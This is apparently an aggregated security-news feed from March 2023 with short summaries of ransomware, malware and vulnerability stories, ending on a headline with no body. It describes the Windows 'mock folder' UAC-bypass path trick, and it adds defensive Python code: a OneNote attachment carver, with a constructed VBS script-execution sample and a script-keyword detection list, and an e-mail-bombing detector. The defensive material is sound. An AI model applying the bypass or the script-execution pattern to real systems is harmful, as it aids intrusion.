                German police announced that they have dismantled an international cybercrime gang behind the DoppelPaymer ransomware operation. Europol has announced that an international operation conducted by law enforcement in Germany and Ukraine, with the help of the US FBI and the Dutch police, targeted two key figures of the DoppelPaymer ransomware group. “On 28 February 2023, the German […]

                The post European police dismantled the DoppelPaymer ransomware gang appeared first on Security Affairs.

                "

                Autosummary: Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, DoppelPaymer) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "


                Old Windows ‘Mock Folders’ UAC bypass used to drop malware

                exploits
                2023-03-06 https://www.bleepingcomputer.com/news/security/old-windows-mock-folders-uac-bypass-used-to-drop-malware/
                A new phishing campaign targets organizations in Eastern European countries with the Remcos RAT malware with aid from an old Windows User Account Control bypass discovered over two years ago. [...]

                Autosummary: A mock directory would look like "C:\Windows \System32", with an extra space after "C:\Windows". The problem is that some Windows programs, like File Explorer, treat "C:\Windows" and "C:\Windows " as the same folder, thus tricking the operating system into thinking "C:\Windows \System32" is a trusted folder whose files should auto-elevate without a UAC prompt.


                Proof-of-Concept released for critical Microsoft Word RCE bug

                exploits
                2023-03-06 https://www.bleepingcomputer.com/news/security/proof-of-concept-released-for-critical-microsoft-word-rce-bug/
                A proof-of-concept for CVE-2023-21716, a critical vulnerability in Microsoft Word that allows remote code execution, has been published over the weekend. [...]

                Autosummary: Tweet-sized PoC: Security researcher Joshua Drake last year discovered the vulnerability in Microsoft Office’s “wwlib.dll” and sent Microsoft a technical advisory containing proof-of-concept (PoC) code showing the issue is exploitable.


                New malware infects business routers for data theft, surveillance

                exploits
                2023-03-06 https://www.bleepingcomputer.com/news/security/new-malware-infects-business-routers-for-data-theft-surveillance/
                An ongoing hacking campaign called "Hiatus" targets DrayTek Vigor router models 2960 and 3900 to steal data from victims and build a covert proxy network. [...]

                Autosummary: Black Lotus Labs' reverse-engineering analysis revealed the following malware features:
                config – load new configuration from the C2
                shell – spawn a remote shell on the infected device
                file – read, delete, or exfiltrate files to the C2
                executor – fetch and execute a file from the C2
                script – execute a script from the C2
                tcp_forward – transmit any TCP data sent to the host's listening port to a forwarding location
                socks5 – set up a SOCKS v5 proxy on the breached router
                quit – stop the malware execution
                The purpose of the SOCKS proxy is to forward data from other infected machines through the breached router, obfuscating network traffic and mimicking legitimate behavior.


                Resecurity appoints Akash Rosen to lead digital forensics practice

                industry
                2023-03-06 https://www.helpnetsecurity.com/2023/03/07/resecurity-akash-rosen/

                Resecurity accelerates its Digital Forensics & Incident Response Services portfolio with the newly appointed industry professional, Akash Rosen. Akash Rosen is a recognized digital forensics expert and investigator. He assisted international law enforcement on numerous cases related to online-banking theft, financial and healthcare fraud, money laundering, malicious code distribution, and network intrusions into enterprise and government networks. Mr. Rosen is an expert court witness and has testified on numerous digital forensics and cybercrime investigation matters. He … More

                The post Resecurity appoints Akash Rosen to lead digital forensics practice appeared first on Help Net Security.

                "

                Autosummary: "


                Ransom House ransomware attack hit Hospital Clinic de Barcelona

                exploits ransomware
                2023-03-06 https://securityaffairs.com/143121/cyber-crime/hospital-clinic-de-barcelona-ransomware.html

                Hospital Clinic de Barcelona, one of the main hospitals in the Spanish city, suffered a cyber attack that crippled its computer system. On Sunday, a ransomware attack hit the Hospital Clinic de Barcelona, one of the main hospitals of the Catalan city. The attack crippled the center’s computer system, 150 nonurgent operations and up to […]

                The post Ransom House ransomware attack hit Hospital Clinic de Barcelona appeared first on Security Affairs.

                "

                Autosummary: "


                Mexico: More than 340 migrants found in truck trailer

                latam
                2023-03-06 https://www.bbc.co.uk/news/world-latin-america-64870110?at_medium=RSS&at_campaign=KARANGA
                Officials find 103 unaccompanied minors among the people inside an abandoned truck in Mexico. "

                Autosummary: "


                National Cybersecurity Strategy Document: What you need to know

                ciber
                2023-03-06 https://www.malwarebytes.com/blog/news/2023/03/national-cybersecurity-strategy-document-what-you-need-to-know

                Categories: News

                Tags: whitehouse

                Tags: biden

                Tags: national cybersecurity document

                Tags: federal

                Tags: government

                Tags: data

                Tags: privacy

                Tags: security

                The US Government has been working on the National Cybersecurity Strategy Document 2023 for some time now, and it’s finally been released.

                (Read more...)

                The post National Cybersecurity Strategy Document: What you need to know appeared first on Malwarebytes Labs.

                "

                Autosummary: As per the WSJ, the five primary areas for action are: Defending critical infrastructure; Disruption and dismantling of criminal gangs; Shape market forces; Investing in a resilient future; Forge international partnerships. One large part of this new strategy is that organisations potentially most well equipped to fend off attacks must step up and do more: “The most capable and best positioned actors in cyberspace must be better stewards of the digital ecosystem... we must ask more [across both the public and private sectors] of the most capable and best positioned actors to make our digital ecosystem more secure and resilient.” Update Federal response plans: You can expect better processes should you need to contact Federal authorities after a cyber incident, with the aim of creating a “unified, coordinated, whole of government response”, with organisations able to quickly and easily find out who to contact, and when. "


                8 cybersecurity tips to keep you safe when travelling

                ciber
                2023-03-06 https://www.malwarebytes.com/blog/news/2023/03/9-cybersecurity-tips-to-keep-you-safe-when-travelling

                Categories: Awareness

                Categories: News

                Tags: travel

                Tags: safe

                Tags: devices

                Tags: VPN

                Tags: backups

                Tags: connections

                Tags: updates

                Here are some cybersecurity tips to keep you safe while you travel.

                (Read more...)

                The post 8 cybersecurity tips to keep you safe when travelling appeared first on Malwarebytes Labs.

                "

                Autosummary: Avoid sites where you need to login, sites with sensitive info (banking, healthcare, etc.), and especially stay away from making purchases over an unsecured connection. Check if there are updates for your operating system (Windows, Android, iOS, or whatever you’re using), banking apps, and anything else which is privacy sensitive and you use on a daily basis. "


                Abortion may be legal in Argentina but women still face major obstacles

                latam
                2023-03-05 https://www.bbc.co.uk/news/world-latin-america-64784660?at_medium=RSS&at_campaign=KARANGA
                Abortion may finally be legal in Argentina, but social attitudes in some areas are making it hard for women to exercise their rights. "

                Autosummary: "


                Play Ransomware gang has begun to leak data stolen from City of Oakland

                exploits government ransomware
                2023-03-05 https://securityaffairs.com/143037/cyber-crime/play-ransomware-leaks-city-of-oakland.html

                The Play ransomware gang has finally begun to leak the data stolen from the City of Oakland in a recent attack. The Play ransomware gang has begun to leak data they have stolen from the City of Oakland (California) in a recent cyberattack. Oakland is the largest city in the East Bay region of the […]

                The post Play Ransomware gang has begun to leak data stolen from City of Oakland appeared first on Security Affairs.

                "

                Autosummary: "


                How to prevent Microsoft OneNote files from infecting Windows with malware

                exploits
                2023-03-05 https://www.bleepingcomputer.com/news/security/how-to-prevent-microsoft-onenote-files-from-infecting-windows-with-malware/
                The seemingly innocuous Microsoft OneNote file has become a popular file format used by hackers to spread malware and breach corporate networks. Here’s how to block malicious OneNote phishing attachments from infecting Windows. [...] "

                Autosummary: [Screenshot: file attachment type blocked in Microsoft OneNote. Source: BleepingComputer] Some suggested file extensions to block are .js, .exe, .com, .cmd, .scr, .ps1, .vbs, and .lnk. [Screenshot: all file attachments blocked in Microsoft OneNote. Source: BleepingComputer] A less restrictive option, but potentially more unsafe, is the "Embedded Files Blocked Extensions" group policy, which allows you to input a list of embedded file extensions that will be blocked from opening in a Microsoft OneNote document. "
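                The group policy keeps a user from opening a risky attachment once the notebook is on the endpoint; the complementary control at a mail gateway is to look inside the .one file and see what is embedded before it is delivered. The following is an added example, not BleepingComputer’s or Microsoft’s code. It carves FileDataStoreObject records, the structure that holds an embedded file in a OneNote section according to Microsoft’s open [MS-ONESTORE] specification (16-byte header GUID, 8-byte data length, 12 bytes unused and reserved, the file data, then a footer GUID), and classifies each by its leading bytes. The .one blob is constructed in memory, and the magic-byte and script-keyword tables are this example’s own heuristics, not part of the file format.

```python
"""Carve embedded file records out of a OneNote (.one) section file.

Added example for triaging OneNote attachments; not BleepingComputer's or
Microsoft's code. Record layout follows the FileDataStoreObject structure in
[MS-ONESTORE]: guidHeader (16), cbLength (8, little-endian), unused (4),
reserved (8), FileData, padding, guidFooter (16). The footer is not relied on.
The sample file below is constructed in memory.
"""
import struct
import uuid

FILE_DATA_HEADER = uuid.UUID("BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC").bytes_le
FILE_DATA_FOOTER = uuid.UUID("71FBA722-0F79-4A0B-BB13-899256426B24").bytes_le
HEADER_LEN = 16 + 8 + 4 + 8  # guidHeader, cbLength, unused, reserved

# Classification heuristics (this example's own, not part of the format).
MAGICS = [
    (b"MZ", "pe_executable"),
    (b"\x7fELF", "elf_executable"),
    (b"PK\x03\x04", "zip_container"),
    (b"%PDF", "pdf"),
    (b"\x89PNG", "png_image"),
    (b"\xff\xd8\xff", "jpeg_image"),
]
SCRIPT_HINTS = (b"wscript", b"createobject(", b"powershell", b"@echo off",
                b"cmd /c", b"function ", b"eval(")
RISKY_KINDS = {"pe_executable", "elf_executable", "script"}


def classify(data: bytes) -> str:
    """Name the payload type from its leading bytes; text is sniffed for script keywords."""
    for magic, kind in MAGICS:
        if data.startswith(magic):
            return kind
    head = data[:512]
    if head and all(32 <= b < 127 or b in (9, 10, 13) for b in head):
        low = head.lower()
        if any(hint in low for hint in SCRIPT_HINTS):
            return "script"
        return "text"
    return "unknown"


def carve_embedded_files(blob: bytes):
    """Return one dict per FileDataStoreObject found in blob, in file order."""
    results = []
    pos = blob.find(FILE_DATA_HEADER)
    while pos != -1:
        if pos + HEADER_LEN > len(blob):
            break
        (cb_length,) = struct.unpack_from("<Q", blob, pos + 16)
        start = pos + HEADER_LEN
        end = start + cb_length
        if cb_length == 0 or end > len(blob):
            # Truncated or corrupt record: report it, then keep scanning past the header.
            results.append({"offset": pos, "size": cb_length, "kind": "corrupt", "risky": True})
            pos = blob.find(FILE_DATA_HEADER, pos + 16)
            continue
        data = blob[start:end]
        kind = classify(data)
        results.append({"offset": pos, "size": cb_length, "kind": kind,
                        "risky": kind in RISKY_KINDS, "data": data})
        pos = blob.find(FILE_DATA_HEADER, end)
    return results


def triage(blob: bytes):
    """Return the kinds of risky records, i.e. what a gateway rule would block or quarantine on."""
    return [r["kind"] for r in carve_embedded_files(blob) if r["risky"]]


def build_record(data: bytes) -> bytes:
    """Serialise one FileDataStoreObject; used only to construct the sample below."""
    pad = (-len(data)) % 8
    return (FILE_DATA_HEADER + struct.pack("<Q", len(data)) + b"\x00" * 12
            + data + b"\x00" * pad + FILE_DATA_FOOTER)


# Constructed sample: filler bytes around three embedded files.
SAMPLE_ONE = (
    b"\x00" * 64
    + build_record(b"\x89PNG\r\n\x1a\n" + b"\x00" * 20)                        # harmless image
    + b"\x11" * 9
    + build_record(b"Set sh = CreateObject(\"WScript.Shell\")\r\nsh.Run \"calc\"\r\n")  # VBS
    + build_record(b"MZ\x90\x00" + b"\x00" * 60)                                # PE stub
    + b"\x00" * 16
)

if __name__ == "__main__":
    for rec in carve_embedded_files(SAMPLE_ONE):
        print(rec["offset"], rec["size"], rec["kind"], "RISKY" if rec["risky"] else "")
```

                Classifying by content rather than by the filename stored elsewhere in the notebook matters here, because the attacker controls the displayed name; the extension list from the article is still the right policy on the endpoint, and this carver is the gateway-side check that does not depend on it.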


                Viasat strengthens network security posture for enterprises with Trusted Cybersecurity Services

                ciber
                2023-03-04 https://www.helpnetsecurity.com/2023/03/04/viasat-trusted-cybersecurity-services/

                The Trusted Cybersecurity Services (TCS) solution, a hosted intrusion detection service that utilizes classified government threat intelligence to identify and address existing, potential, and emerging cyber threats on an organization’s network, has been introduced by Viasat. The service leverages cyber threat intelligence provided by the U.S. Department of Homeland Security (DHS) through the Cybersecurity and Infrastructure Agency (CISA) Enhanced Cybersecurity Services (ECS) program to help protect U.S.-based organizations from malicious cyber threats. Viasat is the … More

                The post Viasat strengthens network security posture for enterprises with Trusted Cybersecurity Services appeared first on Help Net Security.

                "

                Autosummary: "


                New FiXS ATM Malware Targeting Mexican Banks

                financial exploits
                2023-03-04 https://thehackernews.com/2023/03/new-fixs-atm-malware-targeting-mexican.html
                A new ATM malware strain dubbed FiXS has been observed targeting Mexican banks since the start of February 2023. "The ATM malware is hidden inside another not-malicious-looking program," Latin American cybersecurity firm Metabase Q said in a report shared with The Hacker News. Besides requiring interaction via an external keyboard, the Windows-based ATM malware is also vendor-agnostic and is "

                Autosummary: With this development, FiXS becomes the latest in a long list of malware such as Ploutus, Prilex, SUCEFUL, GreenDispenser, RIPPER, Alice, ATMitch, Skimer, and ATMii that have targeted ATMs to siphon money. "


                Ransomware gang leaks data stolen from City of Oakland

                exploits government
                2023-03-04 https://www.bleepingcomputer.com/news/security/ransomware-gang-leaks-data-stolen-from-city-of-oakland/
                The Play ransomware gang has begun to leak data from the City of Oakland, California, that was stolen in a recent cyberattack. [...] "

                Autosummary: "


                FiXS, a new ATM malware that is targeting Mexican banks

                financial exploits
                2023-03-04 https://securityaffairs.com/143022/malware/fixs-atm-malware-mexican-banks.html

                Researchers at Metabase Q discovered a new ATM malware, dubbed FiXS, that was employed in attacks against Mexican banks since February 2023. Researchers at Metabase Q recently spotted a new ATM malware, dubbed FiXS, that is currently targeting Mexican banks. The name comes from the malware’s code name in the binary.  The experts have yet to determine […]

                The post FiXS, a new ATM malware that is targeting Mexican banks appeared first on Security Affairs.

                "

                Autosummary: Below is a list of key relevant characteristics of the FiXS ATM malware: it instructs the ATM to dispense money 30 minutes after the last ATM reboot; it is hidden inside another not-malicious-looking program; it is vendor-agnostic, targeting any ATM that supports CEN XFS; it interacts with the crooks via an external keyboard; it waits for the cassettes to be loaded to start dispensing; it contains Russian metadata. The ATM malware is embedded in a dropper; the experts spotted it due to the presence of XFS-related strings. "


                Attackers are developing and deploying exploits faster than ever

                exploits
                2023-03-03 https://www.helpnetsecurity.com/2023/03/03/attackers-developing-deploying-exploits/

                While there was a reduction in the widespread exploitation of new vulnerabilities in 2022, the risk remains significant as broad and opportunistic attacks continue to pose a threat, according to Rapid7. Deploying exploits Attackers are developing and deploying exploits faster than ever. 56% of the vulnerabilities were exploited within seven days of public disclosure — a 12% rise over 2021 and an 87% rise over 2020. In 2022, the median time to exploitation was just … More

                The post Attackers are developing and deploying exploits faster than ever appeared first on Help Net Security.

                "

                Autosummary: "


                Robotaxi tech improves but can they make money?

                financial
                2023-03-03 https://www.bbc.co.uk/news/business-64742934?at_medium=RSS&at_campaign=KARANGA
                Despite setbacks, robotaxi services from Cruise and Waymo are making progress, but will they make money? "

                Autosummary: "


                The role of human insight in AI-based cybersecurity

                ciber
                2023-03-03 https://www.helpnetsecurity.com/2023/03/03/ai-human-insights-cybersecurity/

                To unleash the power of AI, it’s essential to integrate some human input. The technical term is Reinforcement Learning from Human Feedback (RLHF): a machine-learning technique that uses human feedback to train and improve the accuracy of an AI model. ChatGPT, the most notable example of AI and RLHF working together, took the most innovative AI-based language model available (GPT-3 developed by OpenAI) and paired it with RLHF to optimize it for human interaction. The … More

                The post The role of human insight in AI-based cybersecurity appeared first on Help Net Security.

                "

                Autosummary: If AI-based cybersecurity tools leveraged RLHF, they would be immensely powerful, intuitive, and effective and could improve detection and response times to even the most sophisticated threats.By combining AI and RLHF, teams can better identify potential threats, resulting in up to a 90% reduction in the amount of time needed to identify and react to phishing scams, while also significantly reducing the organization’s risk posture. "


                U.S. Cybersecurity Agency Raises Alarm Over Royal Ransomware’s Deadly Capabilities

                exploits ransomware ciber
                2023-03-03 https://thehackernews.com/2023/03/us-cybersecurity-agency-raises-alarm.html
                The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has released a new advisory about Royal ransomware, which emerged in the threat landscape last year. "After gaining access to victims" networks, Royal actors disable antivirus software and exfiltrate large amounts of data before ultimately deploying the ransomware and encrypting the systems," CISA said. The custom ransomware "

                Autosummary: Ransom demands made by Royal vary from $1 million to $11 million, with attacks targeting a variety of critical sectors, including communications, education, healthcare, and manufacturing. "


                The U.S. CISA and FBI warn of Royal ransomware operation

                exploits ransomware
                2023-03-03 https://securityaffairs.com/142941/malware/cisa-fbi-royal-ransomware-alert.html

                The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is warning of the capabilities of the recently emerged Royal ransomware. The human-operated Royal ransomware first appeared on the threat landscape in September 2022, it has demanded ransoms up to millions of dollars. Unlike other ransomware operations, Royal doesn’t offer Ransomware-as-a-Service, it appears to be a private group without […]

                The post The U.S. CISA and FBI warn of Royal ransomware operation appeared first on Security Affairs.

                "

                Autosummary: The ransomware encrypts the network shares that are found on the local network, and the local drives, with the AES algorithm. The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) released a joint Cybersecurity Advisory (CSA) to provide organizations with tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) associated with this ransomware family. "


                Retailer WH Smith discloses data breach after a cyberattack

                financial ciber
                2023-03-03 https://securityaffairs.com/142918/data-breach/wh-smith-data-breach.html

                Retailer WH Smith disclosed a data breach following a cyber attack in which threat actors had access to company data. Retailer WH Smith revealed that threat actors have breached its infrastructure and had access to the data of about 12,500 current and former employees. The company immediately launched an investigation into the incident with the help […]

                The post Retailer WH Smith discloses data breach after a cyberattack appeared first on Security Affairs.

                "

                Autosummary: "


                New Flaws in TPM 2.0 Library Pose Threat to Billions of IoT and Enterprise Devices

                industry
                2023-03-03 https://thehackernews.com/2023/03/new-flaws-in-tpm-20-library-pose-threat.html
                A pair of serious security defects has been disclosed in the Trusted Platform Module (TPM) 2.0 reference library specification that could potentially lead to information disclosure or privilege escalation. One of the vulnerabilities, CVE-2023-1017, concerns an out-of-bounds write, while the other, CVE-2023-1018, is described as an out-of-bounds read. Credited with discovering and reporting the "

                Autosummary: "


                Colombia protests: Seventy-nine police officers taken hostage

                latam
                2023-03-03 https://www.bbc.co.uk/news/world-latin-america-64834573?at_medium=RSS&at_campaign=KARANGA
                President Gustavo Petro has demanded the release of officials seized by rural protesters. "

                Autosummary: "


                James Cleverly says Falklands are British as Argentina ends deal

                latam
                2023-03-03 https://www.bbc.co.uk/news/uk-64835605?at_medium=RSS&at_campaign=KARANGA
                Argentina has broken a co-operation deal and is calling for talks over the sovereignty of the Falklands. "

                Autosummary: "


                FBI and CISA warn of increasing Royal ransomware attack risks

                exploits ransomware
                2023-03-03 https://www.bleepingcomputer.com/news/security/fbi-and-cisa-warn-of-increasing-royal-ransomware-attack-risks/
                CISA and the FBI have issued a joint advisory highlighting the increasing threat behind ongoing Royal ransomware attacks targeting many U.S. critical infrastructure sectors, including healthcare, communications, and education. [...] "

                Autosummary: In response, the FBI and CISA shared indicators of compromise and a list of tactics, techniques, and procedures (TTPs) linked to the group, which would help defenders detect and block attempts to deploy Royal ransomware payloads on their networks. "


                Play ransomware claims disruptive attack on City of Oakland

                exploits government ransomware
                2023-03-03 https://www.bleepingcomputer.com/news/security/play-ransomware-claims-disruptive-attack-on-city-of-oakland/
                The Play ransomware gang has taken responsibility for a cyberattack on the City of Oakland that has disrupted IT systems since mid-February. [...] "

                Autosummary: City of Oakland listed on Play ransomware site (BleepingComputer) The threat actors claim to have stolen documents containing private, confidential data, financial and government papers, identity documents, passports, personal employee data, and even information allegedly proving human rights violations. "


                The Week in Ransomware - March 3rd 2023 - Wide impact attacks

                exploits ransomware
                2023-03-03 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-march-3rd-2023-wide-impact-attacks/
                This week was highlighted by a massive BlackBasta ransomware attack targeting DISH Network and taking down numerous subsidiaries, including SlingTV and Boost Mobile. [...] "

                Autosummary: Contributors and those who provided new ransomware information and stories this week include: @malwareforme, @DanielGallagher, @Ionut_Ilascu, @fwosar, @struppigel, @Seifreed, @demonslay335, @LawrenceAbrams, @malwrhunterteam, @BleepinComputer, @FourOctets, @PolarToffee, @billtoulas, @jorntvdw, @serghei, @juanbrodersen, @CISAgov, @jgreigj, @Bitdefender, @cyfirma, and @pcrisk. "


                LockBit ransomware demands $2 million for Pierce Transit data

                exploits ransomware
                2023-03-03 https://www.malwarebytes.com/blog/news/2023/03/public-transportation-service-pierce-transit-struck-by-lockbit-ransomware

                Categories: News

                Categories: Ransomware

                Tags: Pierce Transit

                Tags: Tacoma

                Tags: Washington

                Tags: LockBit

                Tags: ransomware

                The ransomware group LockBit is offering data stolen from a Washington state public transit operator on the dark web.

                (Read more...)

                The post LockBit ransomware demands $2 million for Pierce Transit data appeared first on Malwarebytes Labs.

                "

                Autosummary: The ransomware group claims to have stolen contracts, client information, non-disclosure agreements, correspondence, and more, all of which are now on sale. The attack began on February 14, 2023, and required Pierce Transit to implement temporary workarounds, to maintain the service of the transit system which transports around 18,000 people every day. On February 28, the LockBit ransomware group published details of the attack on Pierce Transit, along with a public demand for just shy of $2 million in return for the stolen data. "


                Fire knocks out half of Argentina"s power grid

                latam
                2023-03-02 https://www.bbc.co.uk/news/world-latin-america-64819483?at_medium=RSS&at_campaign=KARANGA
                The capital Buenos Aires, other major cities and large swathes of the countryside are affected. "

                Autosummary: "


                Uncovering the most pressing cybersecurity concerns for SMBs

                ciber
                2023-03-02 https://www.helpnetsecurity.com/2023/03/02/pressing-cybersecurity-concerns-smbs-video/

                In this Help Net Security video interview, James Edgar, CISO at Fleetcor, discusses what consequences SMBs are most concerned about when it comes to cyberattacks, what technology SMBs are most interested in, and much more.

                The post Uncovering the most pressing cybersecurity concerns for SMBs appeared first on Help Net Security.

                "

                Autosummary: "


                SysUpdate Malware Strikes Again with Linux Version and New Evasion Tactics

                exploits industry
                2023-03-02 https://thehackernews.com/2023/03/sysupdate-malware-strikes-again-with.html
                The threat actor known as Lucky Mouse has developed a Linux version of a malware toolkit called SysUpdate, expanding on its ability to target devices running the operating system. The oldest version of the updated artifact dates back to July 2022, with the malware incorporating new features designed to evade security software and resist reverse engineering. Cybersecurity company Trend Micro said "

                Autosummary: Lucky Mouse is also tracked under the monikers APT27, Bronze Union, Emissary Panda, and Iron Tiger, and is known to utilize a variety of malware such as SysUpdate, HyperBro, PlugX, and a Linux backdoor dubbed rshell. "


                Threat actors target law firms with GootLoader and SocGholish malware

                exploits
                2023-03-02 https://securityaffairs.com/142888/cyber-crime/law-firms-gootloader-socgholish-malware.html

                Cyber criminals are targeting law firms with GootLoader and FakeUpdates (aka SocGholish) malware families. Researchers from eSentire have foiled 10 cyberattacks targeting six different law firms throughout January and February of 2023. The firms were targeted as part of two distinct campaigns aimed at distributing GootLoader and FakeUpdates (aka SocGholish) malware. “The attacks emanated from two separate threat […]

                The post Threat actors target law firms with GootLoader and SocGholish malware appeared first on Security Affairs.

                "

                Autosummary: "


                British retail chain WH Smith says data stolen in cyberattack

                ciber
                2023-03-02 https://www.bleepingcomputer.com/news/security/british-retail-chain-wh-smith-says-data-stolen-in-cyberattack/
                British retailer WH Smith has suffered a data breach that exposed information belonging to current and former employees. [...] "

                Autosummary: Customer data is safe: “WH Smith PLC has been the target of a cyber security incident which has resulted in illegal access to some company data, including current and former employee data,” reads the company’s cybersecurity notice filed with London’s Stock Exchange. "


                US government puts cybersecurity at forefront with newly announced National Strategy

                government ciber
                2023-03-02 https://www.helpnetsecurity.com/2023/03/02/us-government-puts-cybersecurity-at-forefront-with-newly-announced-national-strategy/

                The National Cybersecurity Strategy was unveiled today by the Biden-Harris Administration. The Strategy recognizes that government must use all tools of national power in a coordinated manner to protect national security, public safety, and economic prosperity. The United States will make its digital ecosystem: Defensible, where cyber defense is overwhelmingly easier, cheaper, and more effective; Resilient, where cyber incidents and errors have little widespread or lasting impact. The Administration has already taken steps to secure … More

                The post US government puts cybersecurity at forefront with newly announced National Strategy appeared first on Help Net Security.

                "

                Autosummary: "


                Hackers Exploit Containerized Environments to Steal Proprietary Data and Software

                exploits
                2023-03-02 https://thehackernews.com/2023/03/hackers-exploit-containerized.html
                A sophisticated attack campaign dubbed SCARLETEEL is targeting containerized environments to perpetrate theft of proprietary data and software. "The attacker exploited a containerized workload and then leveraged it to perform privilege escalation into an AWS account in order to steal proprietary software and credentials," Sysdig said in a new report. The advanced cloud attack also entailed the "

                Autosummary: "


                Experts Identify Fully-Featured Info Stealer and Trojan in Python Package on PyPI

                exploits
                2023-03-02 https://thehackernews.com/2023/03/experts-identify-fully-featured-info.html
                A malicious Python package uploaded to the Python Package Index (PyPI) has been found to contain a fully-featured information stealer and remote access trojan. The package, named colourfool, was identified by Kroll’s Cyber Threat Intelligence team, with the company calling the malware Colour-Blind. "The "Colour-Blind" malware points to the democratization of cybercrime that could lead to an "

                Autosummary: The trojan is feature rich and is capable of gathering passwords, terminating applications, taking screenshots, logging keystrokes, opening arbitrary web pages on a browser, executing commands, capturing crypto wallet data, and even snooping on victims via the web camera. "


                Australian woman arrested for email bombing a government office

                government
                2023-03-02 https://www.bleepingcomputer.com/news/security/australian-woman-arrested-for-email-bombing-a-government-office/
                The Australian Federal Police arrested a woman in Werrington, Sydney, for allegedly email bombing the office of a Federal Member of Parliament. [...] "

                Autosummary: This likely means that the arrested woman used an "email bombing" service that allows customers to send many emails to a target from different addresses, thus making it challenging for the recipient to contain and manage the atypical denial of service attack. "
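                The pattern described above, many messages to one mailbox from many unrelated senders in a short time, is also what a mail gateway can key on, since a single legitimate sender retrying in a loop looks quite different. The following is an added example, not from the BleepingComputer article or the Australian Federal Police: a sliding-window detector run over constructed mail-log lines. The `from=<...> to=<...>` line format and the thresholds are assumptions; map your gateway’s timestamp, sender and recipient fields onto parse_line to use it.

```python
"""Detect e-mail bombing: many messages to one mailbox from many senders, fast.

Added example, not from the BleepingComputer article or the AFP. The
one-line-per-delivery log format below is constructed; map your gateway's
timestamp, sender and recipient fields onto parse_line() to use it.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

LOG_RE = re.compile(r"^(?P<ts>\S+) from=<(?P<sender>[^>]*)> to=<(?P<rcpt>[^>]+)>")


def parse_line(line):
    """Return (timestamp, sender, recipient) or None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.fromisoformat(m["ts"].replace("Z", "+00:00"))
    return ts, m["sender"].lower(), m["rcpt"].lower()


def detect_mail_bombs(lines, window_s=60, min_msgs=20, min_distinct_senders=10):
    """One alert per recipient whose inbound rate crosses both thresholds.

    A sliding window per recipient holds (timestamp, sender) pairs no older
    than window_s seconds. Requiring many *distinct* senders separates a
    bombing run (sign-up forms and newsletters abused from many domains) from
    one misbehaving sender retrying in a loop. Lines are expected in time order.
    """
    windows = defaultdict(deque)
    alerts = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, sender, rcpt = parsed
        q = windows[rcpt]
        q.append((ts, sender))
        while q and (ts - q[0][0]).total_seconds() > window_s:
            q.popleft()
        distinct = {s for _, s in q}
        if len(q) >= min_msgs and len(distinct) >= min_distinct_senders:
            a = alerts.get(rcpt)
            if a is None:
                alerts[rcpt] = {"recipient": rcpt, "first_seen": q[0][0].isoformat(),
                                "count": len(q), "distinct_senders": len(distinct)}
            else:  # keep the peak values seen while the burst lasts
                a["count"] = max(a["count"], len(q))
                a["distinct_senders"] = max(a["distinct_senders"], len(distinct))
    return list(alerts.values())


def _constructed_log():
    """Constructed sample: one bombing run, one noisy single sender, one normal mailbox."""
    base = datetime(2023, 3, 1, 9, 0, 0, tzinfo=timezone.utc)
    fmt = "%Y-%m-%dT%H:%M:%SZ"
    lines = []
    for i in range(40):   # 40 confirmations from 40 domains in 20 seconds
        ts = (base + timedelta(seconds=i // 2)).strftime(fmt)
        lines.append(f"{ts} from=<noreply@shop{i}.example> to=<office@mp.example> status=sent")
    for i in range(25):   # one newsletter sender retrying 25 times in 50 seconds
        ts = (base + timedelta(seconds=2 * i)).strftime(fmt)
        lines.append(f"{ts} from=<news@list.example> to=<staff@mp.example> status=sent")
    for i in range(3):    # ordinary trickle to a third mailbox
        ts = (base + timedelta(minutes=i)).strftime(fmt)
        lines.append(f"{ts} from=<bob@partner.example> to=<press@mp.example> status=sent")
    return lines


SAMPLE_LOG = _constructed_log()

if __name__ == "__main__":
    for alert in detect_mail_bombs(SAMPLE_LOG):
        print(alert)
```

                The two thresholds are independent on purpose: lowering min_distinct_senders to 1 turns the detector into a plain rate limiter that also fires on the retrying newsletter sender, which is usually a different response (throttle the sender) than a bombing run (protect the mailbox).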


                White House releases new U.S. national cybersecurity strategy

                ciber
                2023-03-02 https://www.bleepingcomputer.com/news/security/white-house-releases-new-us-national-cybersecurity-strategy/
                The Biden-Harris administration today released its national cybersecurity strategy that focuses on shifting the burden of defending the country’s cyberspace towards software vendors and service providers. [...] "

                Autosummary: "Russia remains a persistent cyber threat as it refines its cyber espionage, attack, influence, and disinformation capabilities to coerce sovereign countries, harbor transnational criminal actors, weaken U.S. alliances and partnerships, and subvert the rules-based international system. "


                Vice Society publishes data stolen during Vesuvius ransomware attack

                exploits ransomware
                2023-03-02 https://grahamcluley.com/vice-society-publishes-data-stolen-during-vesuvius-ransomware-attack/
                A notorious ransomware gang has claimed responsibility for a cyber attack against Vesuvius, the London Stock Exchange-listed molten metal flow engineering company. "

                Autosummary: "


                Trezor crypto wallets under attack in SMS phishing campaign

                financial
                2023-03-02 https://www.tripwire.com/state-of-security/trezor-crypto-wallets-under-attack-sms-phishing-campaign
                Willie Sutton, the criminal who became legendary for stealing from banks during a forty year career, was once asked, "Why do you keep robbing banks?" His answer? "Because that’s where the money is." However, today there’s a better target for robbers than banks, which are typically well-defended against theft... Cryptocurrency wallets. Read more in my article on the Tripwire State of Security blog. "

                Autosummary: Some Trezor users report receiving SMS messages that warn they may be at risk of losing their mountains of Monero, bags of Bitcoin, and packs of Dogecoin: Trezor Suite has recently endured a security breach, assume all your assets are vulnerable. "


                Cisco fixed a critical command injection bug in IP Phone Series

                exploits
                2023-03-02 https://securityaffairs.com/142901/security/cisco-critical-command-injection-bug-ip-phone.html

